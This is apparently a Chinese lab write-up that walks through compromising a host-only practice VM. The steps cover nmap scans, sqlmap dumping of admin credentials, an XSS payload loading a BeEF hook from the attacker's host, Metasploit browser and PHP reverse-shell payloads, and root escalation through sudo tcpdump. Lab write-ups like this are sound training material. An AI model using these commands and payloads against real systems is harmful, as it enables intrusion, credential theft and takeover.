靶机设置
靶机设置为仅主机模式,该靶机特殊,IP固定为192.168.110.151
kali也设置一个网卡为仅主机模式
靶机IP发现
nmap 192.168.110.0、/24
发现靶机IP:192.168.110.151
使用全端口扫描
nmap -p- -A 192.168.110.151
发现有三个端口:111、50791、65535
ssh连接
尝试用 root用户连接
发现提示用户Peter,密码是inthesource
用Peter连接不对,尝试peter
发现拒绝连接
再次扫描端口,发现开放出了80端口
目录扫描
有了80端口,尝试进行目录扫描
访问浏览器页面
目录拼接
拼接/blog/
拼接/images/
发现没有权限
测试SQL注入
发现存在Id参数
发现存在sql注入
sqlmap>python sqlmap.py -u http://192.168.110.151/blog/index.php?search=111 --batch
python sqlmap.py -u http://192.168.110.151/blog/index.php?search=111 --dbs --batch
查看数据库名
python sqlmap.py -u http://192.168.110.151/blog/index.php?search=111 -D oscommerce --tables --batch
python sqlmap.py -u http://192.168.110.151/blog/index.php?search=111 -D oscommerce -T osc_administrators --dump --batch
查看osc_administrator
发现admin账户
将密码进行MD5解密
去掉32
密码为admin
测试xss注入
输入<img src=x>
存在反射型xss漏洞
使用beef-xss进行
到/usr/share/beef-xss/下查看config.yaml文件,;里面有账号密码
登陆
beef-xss
登陆成功
在页面进行注册
Username: <script src="http://192.168.110.128:3000/hook.js"></script>
Password: 123
E-Mail: 123
注册后发现beef上线
使用msf火狐模块攻击
search firefox
use exploit/multi/browser/firefox_proto_crmfrequest
并设置参数
set srvhost 192.168.110.128
set lport 9999
set lhost 192.168.110.128
run
得到生成的url:http://192.168.112.128:8080/bKXzoDlk
set SRVHOST 192.168.110.128
set URIPATH kali(beef的密码)
set LHOST 192.168.110.128
run
use post/multi/manage/shell_to_meterpreter
set session 1
set lhost 192.168.110.128
run
sessions 2
拿到shell
尝试提权
shell
whoami
id
python -c 'import pty; pty.spawn("/bin/bash")'
赋予了peter执行权限,使得peter可以使用ssh连接
cat /etc/passwd
发现还有两个用户:milton、blumbergh
ssh再次连接
再次使用ssh连接
发现连接成功
sudo -l发现存在一个免密操作
尝试使用sudo提权失败
2323端口查看
netstat -tunlpa发现靶机有一个一直在监听的2323端口
telnet连接发现存在一个经纬度坐标29 45'46" N 95 22'59" W
goole查看
发现地址为休斯顿:Houston
telnet再次登录
发现询问问题,查找有关stapler的答案
cd /usr
grep -rno stapler
cat local/bin/cd.py
发现答案为mine
再次登录
成功,sudo -l发现没有免密操作
8888端口查看
netstat -tunlpa发现有8888端口监听
telnet连接,发现失败,看起来像是http服务,再次扫描端口
nmap再次扫描,果然发现存在8888端口的http服务
拼接端口访问,发现文件
拼接oscommerce/
对该目录进行扫描
拼接/admin/
输入之发现的admin,admin,登陆成功
发现文件上传的地方,尝试生成木马上传
提权
在kali中生成木马1.php
上传该木马
在include下中的work拥有上传权限
上传成功
kali上使用msfconsole开启监听
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.110.128
set LPORT 6666
options
run
访问http://192.168.110.151:8888/oscommerce/includes/work/1.php
发现msf成功监听
shell
python -c 'import pty; pty.spawn("/bin/bash")'
生成交互式shell
sudo -l发现一个免密操作
、
尝试进行sudo提权
COMMAND='id'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root
提权成功